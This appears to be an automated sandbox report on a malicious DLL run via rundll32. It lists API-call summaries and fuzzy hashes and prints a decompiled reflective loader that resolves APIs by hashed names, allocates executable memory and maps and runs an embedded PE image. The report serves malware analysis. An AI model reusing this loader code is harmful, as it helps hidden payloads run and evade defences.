                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleErrorLastWrite
                          • String ID:
                          • API String ID: 4006445483-0
                          • Opcode ID: e2dbf064c0cc1dda687c7131b77be32b0832b0bdc4b9d62cd9edae3ecddadc93
                          • Instruction ID: 5c6031847d7f28b3002674f7885f46cd95171fafdbe55c66e434fb1fc027344e
                          • Opcode Fuzzy Hash: e2dbf064c0cc1dda687c7131b77be32b0832b0bdc4b9d62cd9edae3ecddadc93
                          • Instruction Fuzzy Hash: 69616DB1A1871E8BE7198E66CC407AE7792EFC5315F04853AE494C73C4E6F5E8058F62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24CDDF, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 70ec067f2b4cfc1e939f3998260732978ac18d5336dd6650fc2450222f2ac2b5
                          • Instruction ID: 3c90878cdedb13ab112f82f7c16a755e9143ea8c73e4a7700eb362179b19d47f
                          • Opcode Fuzzy Hash: 70ec067f2b4cfc1e939f3998260732978ac18d5336dd6650fc2450222f2ac2b5
                          • Instruction Fuzzy Hash: 3551E07168560EAFEB1D8F18C840BAA73A4FF04B15F11412BE825976D0DBB5EC58CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F2506C7, Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6F2519B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6F253B22,?,00000000,-00000008), ref: 6F251A5F
                          • GetLastError.KERNEL32 ref: 6F25072B
                          • __dosmaperr.LIBCMT ref: 6F250732
                          • GetLastError.KERNEL32(?,?,?,?), ref: 6F25076C
                          • __dosmaperr.LIBCMT ref: 6F250773
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: 5ddd1617364b2b75dd58579ef2ff1842261e4b7a6569e785a1f0a98499f12714
                          • Instruction ID: 8cf91b65a7e393a378961b381d6a31e8cd35480a0cfd85d86ddf59b16dab9e58
                          • Opcode Fuzzy Hash: 5ddd1617364b2b75dd58579ef2ff1842261e4b7a6569e785a1f0a98499f12714
                          • Instruction Fuzzy Hash: 98216D3160870FAF9B10DFA58C80D6BB7B9EF413AD7049619E8189B680D770FC608F91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F251AA1, Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 6F251AA9
                            • Part of subcall function 6F2519B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6F253B22,?,00000000,-00000008), ref: 6F251A5F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F251AE1
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F251B01
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: dc693457a89b63f318082ff71537e01490bec953e460ad83a9ff7161be736ec3
                          • Instruction ID: cac183af48e7b4e051709a98ac8359ca6c4266f6fd05b8422a517a146e6b1439
                          • Opcode Fuzzy Hash: dc693457a89b63f318082ff71537e01490bec953e460ad83a9ff7161be736ec3
                          • Instruction Fuzzy Hash: 9C1144B191960E7E6B015BB18C9DCAF296CEF862A83000122F40081140FBA0DEB0CEB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F2557E6, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6F255197,?,00000001,?,?,?,6F254486,?,?,00000000), ref: 6F2557FD
                          • GetLastError.KERNEL32(?,6F255197,?,00000001,?,?,?,6F254486,?,?,00000000,?,?,?,6F254A0D,?), ref: 6F255809
                            • Part of subcall function 6F2557CF: CloseHandle.KERNEL32(FFFFFFFE,6F255819,?,6F255197,?,00000001,?,?,?,6F254486,?,?,00000000,?,?), ref: 6F2557DF
                          • ___initconout.LIBCMT ref: 6F255819
                            • Part of subcall function 6F255791: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F2557C0,6F255184,?,?,6F254486,?,?,00000000,?), ref: 6F2557A4
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6F255197,?,00000001,?,?,?,6F254486,?,?,00000000,?), ref: 6F25582E
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: da06af9bc53d01ea8c317492df3cd6b051f94bc54d7d3b443d77698bffc5931b
                          • Instruction ID: b1bee48c11ee73b6da72a9d10fd124a31f93d0d74a6cf20655037891bdf99e3c
                          • Opcode Fuzzy Hash: da06af9bc53d01ea8c317492df3cd6b051f94bc54d7d3b443d77698bffc5931b
                          • Instruction Fuzzy Hash: B1F01C36014629FBCF221F9ACC0DA893F26EF0A7B5B014010FE1889960DB728874DF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F25493F, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6F254089: GetConsoleOutputCP.KERNEL32(D62528FD,?,00000000,?), ref: 6F2540EC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,?,?,6F2527EE,?), ref: 6F254AA8
                          • GetLastError.KERNEL32(?,6F2527EE,?,}&%o,00000000,?,00000000,6F25267D,?,00000000,00000000,6F288248,0000002C,6F2526EE,?), ref: 6F254AB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleErrorFileLastOutputWrite
                          • String ID: '%o
                          • API String ID: 2915228174-597949757
                          • Opcode ID: b54c32191bbdb45b4ae9a8de5eceb4f88e66d3f5e263e52d3eea287a7b7fc9b0
                          • Instruction ID: 60d30a4b990f413a52a3b8fddc625dd43fd2625454d8e4da22e7f013d877fc58
                          • Opcode Fuzzy Hash: b54c32191bbdb45b4ae9a8de5eceb4f88e66d3f5e263e52d3eea287a7b7fc9b0
                          • Instruction Fuzzy Hash: 1D617D71D1424EAADF018FA888A5EDEFBB9BF0A318F104145E814AA242D371E935CF64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24D3E0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                          Download Yara Rule
                          APIs
                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F24D405
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: f792fab43d80bc1de8219a737c13769799f524bf5d059ebe3973e900094fa151
                          • Instruction ID: 39b73f3fe8fc4c5312a3b6d970b89b72cfac6e5c51787718299818faa347f2a6
                          • Opcode Fuzzy Hash: f792fab43d80bc1de8219a737c13769799f524bf5d059ebe3973e900094fa151
                          • Instruction Fuzzy Hash: 15417B7190020EAFCF0ACF98C980ADE7BB6BF48305F548099F915672A0D3B5A961DF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: rundll32.exe PID: 6088 Parent PID: 6544 rundll32.exeCOMMON

                          Executed Functions

                          Function 6F249990, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394filememoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 62%
                          			E6F249990(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				intOrPtr _t139;
				struct HDC__* _t144;
				void* _t152;
				signed int _t153;
				void* _t154;
				void* _t164;
				signed int _t167;
				signed int _t169;
				unsigned short _t171;
				void* _t176;
				signed int _t178;
				char _t189;
				void* _t192;
				signed int _t193;
				signed int _t196;
				signed int _t202;
				intOrPtr _t204;
				signed int _t205;
				signed int _t207;
				intOrPtr _t208;
				void* _t209;
				void* _t210;
				signed int _t212;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr* _t219;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed short _t230;
				void* _t235;
				signed int _t236;
				signed int _t237;
				void* _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t249;
				signed int _t250;
				intOrPtr* _t252;
				intOrPtr* _t255;
				intOrPtr* _t256;
				void* _t258;
				intOrPtr* _t260;
				unsigned int _t262;
				intOrPtr* _t264;
				void* _t265;
				void* _t266;
				signed int* _t268;
				signed int _t270;
				signed int _t271;
				intOrPtr* _t273;
				signed int _t277;
				void* _t278;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t283;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed char* _t289;
				intOrPtr _t290;
				signed int _t292;
				void* _t293;
				signed short* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;

				_t137 =  *0x6f28a4a4; // 0x219c2278
				 *(_t299 + 0x4c) = _t137 ^ _t299;
				_t255 =  *((intOrPtr*)(_t299 + 0x64));
				_push(0x400);
				 *((intOrPtr*)(_t299 + 0x2c)) = _t255;
				_t139 = E6F24A04E(__eflags);
				_t256 =  *_t255;
				_t300 = _t299 + 4;
				_t202 = 0;
				 *((intOrPtr*)(_t300 + 0x2c)) = _t139;
				 *(_t300 + 0x24) = 0;
				 *(_t300 + 0x18) = 0;
				 *(_t300 + 0x20) = 0;
				L1:
				while(1) {
					if( *_t256 != 0x5a4d) {
						L4:
						_t256 = _t256 - 1;
						continue;
					}
					_t216 =  *((intOrPtr*)(_t256 + 0x3c));
					if(_t216 - 0x40 > 0x3bf ||  *((intOrPtr*)(_t216 + _t256)) != 0x4550) {
						goto L4;
					}
					 *((intOrPtr*)(_t300 + 0x14)) = _t256;
					_t292 =  *( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14);
					 *(_t300 + 0x1c) = _t292;
					__eflags = _t292;
					if(_t292 != 0) {
						do {
							_t289 =  *(_t292 + 0x28);
							_t236 = 0;
							__eflags = 0;
							_t250 =  *(_t292 + 0x24) & 0x0000ffff;
							do {
								_t271 =  *_t289 & 0x000000ff;
								asm("ror ecx, 0xd");
								__eflags =  *_t289 - 0x61;
								if( *_t289 >= 0x61) {
									_t236 = _t236 + 0xffffffe0;
									__eflags = _t236;
								}
								_t250 = _t250 + 0xffff;
								_t236 = _t236 + _t271;
								_t289 =  &(_t289[1]);
								__eflags = _t250;
							} while (_t250 != 0);
							__eflags = _t236 - 0x6a4abc5b;
							if(_t236 == 0x6a4abc5b) {
								_t290 =  *((intOrPtr*)(_t292 + 0x10));
								_t298 = 3;
								_t192 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 0x3c)) + _t290 + 0x78)) + _t290;
								 *(_t300 + 0x10) = _t192;
								_t273 =  *((intOrPtr*)(_t192 + 0x20)) + _t290;
								_t215 =  *((intOrPtr*)(_t192 + 0x24)) + _t290;
								__eflags = _t215;
								do {
									_t252 =  *_t273 + _t290;
									_t193 = 0;
									__eflags = 0;
									_t237 =  *_t252;
									do {
										asm("ror eax, 0xd");
										_t252 = _t252 + 1;
										_t193 = _t193 + _t237;
										_t237 =  *_t252;
										__eflags = _t237;
									} while (_t237 != 0);
									__eflags = _t193 - 0xec0e4e8e;
									if(_t193 == 0xec0e4e8e) {
										L18:
										_t241 =  *((intOrPtr*)( *(_t300 + 0x10) + 0x1c)) + ( *_t215 & 0x0000ffff) * 4;
										__eflags = _t193 - 0xec0e4e8e;
										if(_t193 != 0xec0e4e8e) {
											__eflags = _t193 - 0x7c0dfcaa;
											if(_t193 != 0x7c0dfcaa) {
												__eflags = _t193 - 0x91afca54;
												if(_t193 == 0x91afca54) {
													_t196 =  *((intOrPtr*)(_t241 + _t290)) + 0x57 + _t290;
													__eflags = _t196;
													 *(_t300 + 0x20) = _t196;
												}
											} else {
												 *(_t300 + 0x18) =  *((intOrPtr*)(_t241 + _t290)) + _t290;
											}
										} else {
											 *(_t300 + 0x24) =  *((intOrPtr*)(_t241 + _t290)) + _t290;
										}
										_t298 = _t298 + 0xffff;
										__eflags = _t298;
									} else {
										__eflags = _t193 - 0x7c0dfcaa;
										if(_t193 == 0x7c0dfcaa) {
											goto L18;
										} else {
											__eflags = _t193 - 0x91afca54;
											if(_t193 == 0x91afca54) {
												goto L18;
											}
										}
									}
									_t273 = _t273 + 4;
									_t215 = _t215 + 2;
									__eflags = _t298;
								} while (_t298 != 0);
								_t202 =  *(_t300 + 0x18);
								_t292 =  *(_t300 + 0x1c);
							}
							__eflags =  *(_t300 + 0x24);
							if( *(_t300 + 0x24) == 0) {
								goto L30;
							} else {
								__eflags = _t202;
								if(_t202 == 0) {
									goto L30;
								} else {
									__eflags =  *(_t300 + 0x20);
									if( *(_t300 + 0x20) == 0) {
										goto L30;
									}
								}
							}
							break;
							L30:
							_t292 =  *_t292;
							 *(_t300 + 0x1c) = _t292;
							__eflags = _t292;
						} while (_t292 != 0);
						_t256 =  *((intOrPtr*)(_t300 + 0x14));
					}
					 *((intOrPtr*)(_t300 + 0x34)) = GetDC;
					_t144 = GetDC(0);
					 *(_t300 + 0x3c) = GetWindowRect;
					GetWindowRect(0, _t300 + 0x3c);
					 *((intOrPtr*)(_t300 + 0x40)) = ReleaseDC;
					ReleaseDC(0, _t144);
					_t204 =  *((intOrPtr*)(_t256 + 0x3c)) + _t256;
					 *((intOrPtr*)(_t300 + 0x38)) = _t204;
					CreateFileA("asd", 0, 0, 0, 0, 0, 0);
					 *((intOrPtr*)(_t300 + 0x30)) =  *(_t300 + 0x20) - GetLastError();
					_t152 = VirtualAlloc(0,  *(_t204 + 0x50), 0x3000, 0x40); // executed
					_t243 =  *(_t204 + 0x54);
					_t293 = _t152;
					 *(_t300 + 0x10) = _t293;
					_t219 = _t256;
					__eflags = _t243;
					if(_t243 != 0) {
						_t288 = _t293 - _t256;
						__eflags = _t288;
						do {
							_t189 =  *_t219;
							_t219 = _t219 + 1;
							 *((char*)(_t288 + _t219 - 1)) = _t189;
							_t243 = _t243 - 1;
							__eflags = _t243;
						} while (_t243 != 0);
					}
					_t258 = ( *(_t204 + 0x14) & 0x0000ffff) + _t204;
					_t205 =  *(_t204 + 6) & 0x0000ffff;
					__eflags = _t205;
					if(_t205 != 0) {
						_t270 = _t258 + 0x2c;
						__eflags = _t270;
						do {
							_t205 = _t205 - 1;
							 *((char*)((_t205 & 0x000003ff) +  *((intOrPtr*)(_t300 + 0x2c)))) =  *(_t300 + 0x20);
							_t235 =  *((intOrPtr*)(_t270 - 8)) + _t293;
							_t249 =  *_t270 +  *((intOrPtr*)(_t300 + 0x14));
							_t286 =  *(_t270 - 4);
							__eflags = _t286;
							if(_t286 != 0) {
								do {
									_t235 = _t235 + 1;
									 *((char*)(_t235 - 1)) =  *_t249;
									_t249 = _t249 + 1;
									_t286 = _t286 - 1;
									__eflags = _t286;
								} while (_t286 != 0);
							}
							_t270 = _t270 + 0x28;
							__eflags = _t205;
						} while (_t205 != 0);
					}
					_t207 =  *(_t300 + 0x1c) - 0xffffff80;
					_t260 = _t293 +  *_t207;
					 *((intOrPtr*)(_t300 + 0x14)) = _t260;
					_t153 =  *(_t260 + 0xc);
					__eflags = _t153;
					if(_t153 != 0) {
						while(1) {
							__eflags =  *_t207;
							if( *_t207 == 0) {
								goto L50;
							}
							_t297 =  *((intOrPtr*)(_t300 + 0x28))(_t293 + _t153);
							_t176 =  *(_t300 + 0x10);
							_t285 =  *_t260 + _t176;
							_t268 =  *((intOrPtr*)(_t260 + 0x10)) + _t176;
							__eflags =  *_t268;
							if( *_t268 != 0) {
								asm("o16 nop [eax+eax]");
								do {
									__eflags = _t285;
									if(_t285 == 0) {
										L47:
										_t207 = _t176 +  *_t268;
										__eflags = _t207;
										_t178 =  *(_t300 + 0x20)(_t297, _t207 + 2);
									} else {
										_t230 =  *_t285;
										__eflags = _t230;
										if(_t230 >= 0) {
											goto L47;
										} else {
											_t178 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x3c)) + _t297 + 0x78)) + _t297 + 0x1c)) + ((_t230 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x3c)) + _t297 + 0x78)) + _t297 + 0x10))) * 4 + _t297)) + _t297;
										}
									}
									 *_t268 = _t178;
									_t268 =  &(_t268[1]);
									__eflags = _t285;
									_t84 = _t285 + 4; // 0x4
									_t180 =  ==  ? _t285 : _t84;
									__eflags =  *_t268;
									_t285 =  ==  ? _t285 : _t84;
									_t176 =  *(_t300 + 0x10);
								} while ( *_t268 != 0);
							}
							_t293 =  *(_t300 + 0x10);
							_t260 =  *((intOrPtr*)(_t300 + 0x14)) + 0x14;
							 *((intOrPtr*)(_t300 + 0x14)) = _t260;
							_t153 =  *(_t260 + 0xc);
							__eflags = _t153;
							if(_t153 != 0) {
								continue;
							}
							goto L50;
						}
					}
					L50:
					_t154 =  *((intOrPtr*)(_t300 + 0x34))(0);
					 *(_t300 + 0x3c)(0, _t300 + 0x4c);
					 *((intOrPtr*)(_t300 + 0x40))(0, _t154);
					_t244 =  *(_t300 + 0x1c);
					_t262 = _t293 -  *((intOrPtr*)(_t244 + 0x34));
					__eflags =  *(_t244 + 0xa4);
					if( *(_t244 + 0xa4) != 0) {
						_t225 =  *((intOrPtr*)(_t244 + 0xa0)) + _t293;
						 *(_t300 + 0x18) = _t225;
						_t169 =  *(_t225 + 4);
						__eflags = _t169;
						if(_t169 != 0) {
							do {
								_t100 = _t169 - 8; // -8
								_t283 =  *_t225 + _t293;
								_t212 = _t100 >> 1;
								__eflags = _t212;
								_t296 = _t225 + 8;
								if(_t212 != 0) {
									do {
										_t245 =  *_t296 & 0x0000ffff;
										_t212 = _t212 - 1;
										_t226 = _t245;
										_t171 = _t245 >> 0xc;
										__eflags = _t171 - 0xa;
										if(_t171 != 0xa) {
											__eflags = _t171 - 3;
											if(_t171 != 3) {
												__eflags = _t171 - 1;
												if(_t171 != 1) {
													__eflags = _t171 - 2;
													if(_t171 == 2) {
														_t227 = _t226 & 0x00000fff;
														_t108 = _t227 + _t283;
														 *_t108 =  *(_t227 + _t283) + _t262;
														__eflags =  *_t108;
													}
												} else {
													 *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) + (_t262 >> 0x10);
												}
											} else {
												 *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) + _t262;
											}
										} else {
											 *((intOrPtr*)((_t245 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t245 & 0x00000fff) + _t283)) + _t262;
										}
										_t296 =  &(_t296[1]);
										__eflags = _t212;
									} while (_t212 != 0);
									_t225 =  *(_t300 + 0x18);
									_t169 =  *(_t225 + 4);
								}
								_t293 =  *(_t300 + 0x10);
								_t225 = _t225 + _t169;
								 *(_t300 + 0x18) = _t225;
								_t169 =  *(_t225 + 4);
								__eflags = _t169;
							} while (_t169 != 0);
							_t244 =  *(_t300 + 0x1c);
						}
					}
					 *0x6f28ae08 = _t293;
					_t264 =  *((intOrPtr*)(_t244 + 0x28)) + _t293;
					_t277 =  *( *((intOrPtr*)(_t293 + 0x3c)) + _t293 + 0xc0);
					__eflags = _t277;
					if(_t277 != 0) {
						_t281 =  *(_t277 + _t293 + 0xc);
						__eflags = _t281;
						if(_t281 != 0) {
							_t167 =  *_t281;
							__eflags = _t167;
							while(_t167 != 0) {
								 *_t167(_t293, 1, 0);
								_t167 =  *(_t281 + 4);
								_t281 = _t281 + 4;
								__eflags = _t167;
							}
						}
					}
					_t208 =  *((intOrPtr*)(_t300 + 0x28));
					__eflags =  *(_t208 + 0x1c);
					if( *(_t208 + 0x1c) != 0) {
						 *_t264( *((intOrPtr*)(_t208 + 0x10)), 1, 0);
						goto L77;
					} else {
						_push( *((intOrPtr*)(_t208 + 4)));
						_push(_t293);
						_t279 = E6F249850();
						_t300 = _t300 + 8;
						__eflags = _t279;
						if(_t279 == 0) {
							L77:
							_pop(_t265);
							_pop(_t278);
							_pop(_t209);
							__eflags =  *(_t300 + 0x5c) ^ _t300;
							return E6F24A057( *((intOrPtr*)(_t300 + 0x28)), _t209,  *(_t300 + 0x5c) ^ _t300, _t244, _t265, _t278);
						} else {
							__eflags =  *(_t208 + 0x20);
							if( *(_t208 + 0x20) != 0) {
								E6F249920(_t293);
								_t300 = _t300 + 4;
							}
							 *_t264( *((intOrPtr*)(_t208 + 0x10)), 1, 0);
							_t164 =  *_t279( *((intOrPtr*)(_t208 + 0xc)),  *((intOrPtr*)(_t208 + 0x10)),  *((intOrPtr*)(_t208 + 0x14)),  *((intOrPtr*)(_t208 + 0x18)));
							_pop(_t266);
							_pop(_t280);
							_pop(_t210);
							__eflags =  *(_t300 + 0x4c) ^ _t300;
							return E6F24A057(_t164, _t210,  *(_t300 + 0x4c) ^ _t300, _t244, _t266, _t280);
						}
					}
				}
			}













































































                          0x6f249993
                          0x6f24999a
                          0x6f2499a2
                          0x6f2499a6
                          0x6f2499ab
                          0x6f2499af
                          0x6f2499b4
                          0x6f2499b6
                          0x6f2499b9
                          0x6f2499bb
                          0x6f2499bf
                          0x6f2499cc
                          0x6f2499d0
                          0x00000000
                          0x6f2499d4
                          0x6f2499d7
                          0x6f2499ef
                          0x6f2499ef
                          0x00000000
                          0x6f2499ef
                          0x6f2499d9
                          0x6f2499e4
                          0x00000000
                          0x00000000
                          0x6f2499f8
                          0x6f2499ff
                          0x6f249a02
                          0x6f249a06
                          0x6f249a08
                          0x6f249a10
                          0x6f249a10
                          0x6f249a13
                          0x6f249a13
                          0x6f249a15
                          0x6f249a20
                          0x6f249a20
                          0x6f249a23
                          0x6f249a26
                          0x6f249a29
                          0x6f249a2b
                          0x6f249a2b
                          0x6f249a2b
                          0x6f249a2e
                          0x6f249a34
                          0x6f249a36
                          0x6f249a37
                          0x6f249a37
                          0x6f249a3c
                          0x6f249a42
                          0x6f249a48
                          0x6f249a4b
                          0x6f249a57
                          0x6f249a59
                          0x6f249a63
                          0x6f249a65
                          0x6f249a65
                          0x6f249a67
                          0x6f249a69
                          0x6f249a6b
                          0x6f249a6b
                          0x6f249a6d
                          0x6f249a70
                          0x6f249a70
                          0x6f249a73
                          0x6f249a79
                          0x6f249a7b
                          0x6f249a7d
                          0x6f249a7d
                          0x6f249a81
                          0x6f249a86
                          0x6f249a96
                          0x6f249aa0
                          0x6f249aa3
                          0x6f249aa8
                          0x6f249ab5
                          0x6f249aba
                          0x6f249ac7
                          0x6f249acc
                          0x6f249ad4
                          0x6f249ad4
                          0x6f249ad6
                          0x6f249ad6
                          0x6f249abc
                          0x6f249ac1
                          0x6f249ac1
                          0x6f249aaa
                          0x6f249aaf
                          0x6f249aaf
                          0x6f249ada
                          0x6f249ada
                          0x6f249a88
                          0x6f249a88
                          0x6f249a8d
                          0x00000000
                          0x6f249a8f
                          0x6f249a8f
                          0x6f249a94
                          0x00000000
                          0x00000000
                          0x6f249a94
                          0x6f249a8d
                          0x6f249ae0
                          0x6f249ae3
                          0x6f249ae6
                          0x6f249ae6
                          0x6f249aef
                          0x6f249af3
                          0x6f249af3
                          0x6f249af7
                          0x6f249afc
                          0x00000000
                          0x6f249afe
                          0x6f249afe
                          0x6f249b00
                          0x00000000
                          0x6f249b02
                          0x6f249b02
                          0x6f249b07
                          0x00000000
                          0x00000000
                          0x6f249b07
                          0x6f249b00
                          0x00000000
                          0x6f249b09
                          0x6f249b09
                          0x6f249b0c
                          0x6f249b10
                          0x6f249b10
                          0x6f249b18
                          0x6f249b18
                          0x6f249b23
                          0x6f249b27
                          0x6f249b37
                          0x6f249b3b
                          0x6f249b45
                          0x6f249b49
                          0x6f249b5a
                          0x6f249b61
                          0x6f249b65
                          0x6f249b83
                          0x6f249b87
                          0x6f249b89
                          0x6f249b8c
                          0x6f249b8e
                          0x6f249b92
                          0x6f249b94
                          0x6f249b96
                          0x6f249b9a
                          0x6f249b9a
                          0x6f249ba0
                          0x6f249ba0
                          0x6f249ba2
                          0x6f249ba5
                          0x6f249ba9
                          0x6f249ba9
                          0x6f249ba9
                          0x6f249ba0
                          0x6f249bb2
                          0x6f249bb4
                          0x6f249bb8
                          0x6f249bba
                          0x6f249bbc
                          0x6f249bbc
                          0x6f249bc0
                          0x6f249bc4
                          0x6f249bd0
                          0x6f249bd8
                          0x6f249bda
                          0x6f249bde
                          0x6f249be1
                          0x6f249be3
                          0x6f249be5
                          0x6f249be7
                          0x6f249bea
                          0x6f249bed
                          0x6f249bf0
                          0x6f249bf0
                          0x6f249bf0
                          0x6f249be5
                          0x6f249bf5
                          0x6f249bf8
                          0x6f249bf8
                          0x6f249bc0
                          0x6f249c00
                          0x6f249c05
                          0x6f249c07
                          0x6f249c0b
                          0x6f249c0e
                          0x6f249c10
                          0x6f249c16
                          0x6f249c16
                          0x6f249c19
                          0x00000000
                          0x00000000
                          0x6f249c28
                          0x6f249c2a
                          0x6f249c2e
                          0x6f249c33
                          0x6f249c35
                          0x6f249c38
                          0x6f249c3a
                          0x6f249c40
                          0x6f249c40
                          0x6f249c42
                          0x6f249c66
                          0x6f249c68
                          0x6f249c68
                          0x6f249c6f
                          0x6f249c44
                          0x6f249c44
                          0x6f249c46
                          0x6f249c48
                          0x00000000
                          0x6f249c4a
                          0x6f249c62
                          0x6f249c62
                          0x6f249c48
                          0x6f249c73
                          0x6f249c75
                          0x6f249c78
                          0x6f249c7a
                          0x6f249c7d
                          0x6f249c80
                          0x6f249c83
                          0x6f249c85
                          0x6f249c85
                          0x6f249c40
                          0x6f249c8f
                          0x6f249c93
                          0x6f249c96
                          0x6f249c9a
                          0x6f249c9d
                          0x6f249c9f
                          0x00000000
                          0x00000000
                          0x00000000
